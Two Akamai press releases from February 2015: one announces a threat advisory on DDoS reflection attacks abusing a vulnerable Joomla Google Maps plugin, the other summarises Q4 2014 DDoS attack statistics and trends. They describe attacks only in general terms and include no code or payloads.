Kuala Lumpur – February 26, 2015 – Akamai Technologies, Inc. (NASDAQ: AKAM), the leading provider of cloud services for delivering, optimizing and securing online content and business applications, today released, through the company’s Prolexic Security Engineering & Research Team (PLXsert) in collaboration with PhishLabs’ R.A.I.D (Research, Analysis, and Intelligence Division), a new cybersecurity threat advisory. The advisory alerts enterprises and Software-as-a-Service (SaaS) providers of attackers using Joomla servers with a vulnerable Google Maps plugin installed as a platform for launching distributed denial of service (DDoS) attacks. The advisory is available for download from www.stateoftheinternet.com/joomla-reflection.
“Vulnerabilities in web applications hosted by Software-as-a-Service providers continue to provide ammunition for criminal entrepreneurs. Now they are preying on a vulnerable Joomla plugin for which they’ve invented a new DDoS attack and DDoS-for-hire tools,” said Stuart Scholly, senior vice president and general manager, Security Business Unit, Akamai. “This is one more web application vulnerability in a sea of vulnerabilities – with no end in sight. Enterprises need to have a DDoS protection plan in place to mitigate denial of service traffic from the millions of cloud-based SaaS servers that can be used for DDoS.”
Vulnerability in Google Maps plugin for Joomla enables DDoS attacks
A known vulnerability in a Google Maps plugin for Joomla allows the plugin to act as a proxy. A proxy is an intermediary server that processes a request and returns the result on behalf of someone else. The vulnerable Google Maps plugin allows Joomla servers that use it to be used as a proxy. Attackers spoof (fake) the source of the requests, causing the results to be sent from the proxy to someone else – their denial of service target. The true source of the attack remains unknown, because the attack traffic appears to come from the Joomla servers.
With cooperation from PhishLabs’ R.A.I.D, PLXsert matched DDoS signature traffic originating from multiple Joomla sites, which indicates vulnerable installations are being used en masse for reflected GET floods, a type of DDoS attack. Observed attack traffic and data suggest the attack is being offered on known DDoS-for-hire sites.
PLXsert was able to identify more than 150,000 potential Joomla reflectors on the Internet. Although many of the servers appear to have been patched, reconfigured, locked or have had the plugin uninstalled, others remain vulnerable to use in this DDoS attack.
Details of a mitigated DDoS attack
PLXsert mitigated a DDoS attack of this type on behalf of an Akamai customer in November. The majority of the top attacking IP addresses originated from Germany. The same IP addresses that participated in this attack have participated in DDoS attacks against other Akamai customers in the industries of hosting, entertainment and consumer goods.
Multi-layered DDoS mitigation protects against reflection DDoS attacks
Refection-based DDoS attacks of many types are popular at this time. In the fourth quarter of 2014, Akamai’s PLXsert observed 39 percent of all DDoS attack traffic employed reflection techniques. Reflection DDoS attacks each take advantage of an Internet protocol or application vulnerability that allows DDoS attackers to reflect malicious traffic off a third-party server or device, hiding their identities and amplifying the amount of attack traffic in the process.
Cloud-based DDoS attack mitigation can combat this problem to protect organizations from malicious traffic. Edge-based security and scrubbing centers stop DDoS attack traffic long before it affects a client’s website or data center.
Get the Joomla Reflection DDoS-for-Hire Threat Advisory to learn more
In the advisory, PLXsert shares its analysis and details, including:
- Use of the GET flood in Joomla reflection
- What to look for: Three sample payloads
- Attacks from the DAVOSET DDoS tool
- Attacks from the UFONet DDoS tool
- GET flood requests observed during an attack
- Geographical distribution of source traffic
- Three DDoS mitigation procedures to stop DDoS attacks of this type
A complimentary copy of the threat advisory is available for download at www.stateoftheinternet.com/joomla-reflection.
MALAYSIA (Feb.17, 2015) – Akamai Technologies, Inc. (NASDAQ: AKAM), the leading provider of cloud services for delivering, optimizing and securing online content and business applications, today announced the availability of the Q4 2014 State of the Internet – Security Report. The report is produced by Akamai’s Prolexic Security Engineering and Research Team (PLXsert), leading professionals in distributed denial of service (DDoS) protection and cloud security services and strategies. This quarter’s report, which provides analysis and insight into the global attack threat landscape including DDoS attacks observed across the PLXrouted network, can be downloaded at www.stateoftheinternet.com/security-report.
“An incredible number of DDoS attacks occurred in the fourth quarter, almost double what we observed in Q4 a year ago,” said John Summers, vice president, Cloud Security Business Unit, Akamai. “Denial of service is a common and active threat to a wide range of enterprises. The DDoS attack traffic was not limited to a single industry, such as online entertainment that made headlines in December. Instead, attacks were spread among a wide variety of industries.”
Akamai also observed a 52 percent increase in average peak bandwidth of DDoS attacks compared to Q4 a year ago. Large packets of unwanted network traffic can quickly sap an enterprise’s ability to respond to legitimate customers, resulting in denial of service outages. Most unprotected sites cannot withstand a typical DDoS attack. As a result, DDoS attacks have become part of the common cybersecurity threatscape that all enterprises with an online presence must anticipate in a risk assessment.
DDoS-for-hire and the rise of reflection and multi-vector attacks
Resourceful DDoS-for-hire booter suites took a low-investment approach by tapping into reflection-based DDoS attacks. Nearly 40 percent of all DDoS attacks used reflection techniques, which rely on Internet protocols that respond with more traffic than they receive and do not require an attacker to gain control over the server or device.
Widespread availability of for-hire DDoS services allowed low-level, non-technical attackers to purchase ready-to-use DDoS services. The expansion of the DDoS-for-hire market also promoted the use of multi-vector campaigns, as the competitive market drove attack innovation. Significantly more multi-vector attacks were observed – 88 percent more than in Q4 2013. More than 44 percent of all attacks used multiple attack vectors.
Changing global distribution of DDoS targets and sources
The timing of DDoS attacks was distributed more evenly in Q4, a DDoS trend that appears to be fueled by an increasing number of targets of greater value in previously underrepresented geographic locations. In addition, geographical sources of malicious traffic have shifted. The United States and China continued as the lead source countries for DDoS traffic, but instead of the Brazil, Russia, India and China (BRIC) block that dominated in Q3 2014, Q4 DDoS attack traffic came in large part from the United States, China and Western Europe.
Highlights from the Akamai PLXsert Q4 2014 State of the Internet – Security Report
Compared to Q4 2013
- 57 percent more DDoS attacks
- 52 percent increase in average peak bandwidth
- 77 percent decrease in average peak packets per second
- 51 percent more application layer attacks
- 58 percent more infrastructure layer attacks
- 28 percent increase in average attack duration
- 84 percent more multi-vector attacks
- 200 percent increase in 100+ Gbps attacks (9 vs. 3)
Compared to Q3 2014
- 90 percent more DDoS attacks
- 54 percent decrease in average peak attack bandwidth
- 83 percent decrease in average peak packets per second
- 16 percent more application layer attacks
- 121 percent more infrastructure layer attacks
- 31 percent increase in average attack duration
- 38 percent more multi-vector attacks
- 47 percent fewer 100+ Gbps attacks (9 vs. 17)
A look into botnets
Malware is often used for DDoS botnet expansion. Malware trends – multiplatform, operating system awareness, and destructive malware – are described in the Security Report. In addition, Akamai profiled multiple web application attack botnets using a new analysis technique that takes advantage of data gleaned from the Akamai Intelligent Platform™. The identified botnets were set up to automate the discovery of web application vulnerabilities for Remote File Inclusion (RFI) and Operating System (OS) Command Injection attacks. Akamai researchers profiled the botnets by identifying malicious code resource URLs and payloads that were identical among seemingly unrelated attacks. An attack payload was used to aggregate data and map botnet activity, actors and victim web applications. This profiling technique can help identify more attack sources.
Mitigation of bots, scrapers and spiders
While denial of service attacks impacts site performance significantly, web crawlers can also affect site performance to a lesser degree. The most poorly coded crawlers may even resemble DDoS traffic. Akamai classifies web crawlers based on desirability and impact on site performance. The Security Report provides advice on classifying and mitigating their effects.
Download the report
A complimentary copy of the Akamai PLXsert Q4 2014 State of the Internet – Security Report is available as a free PDF download at www.stateoftheinternet.com/security-report.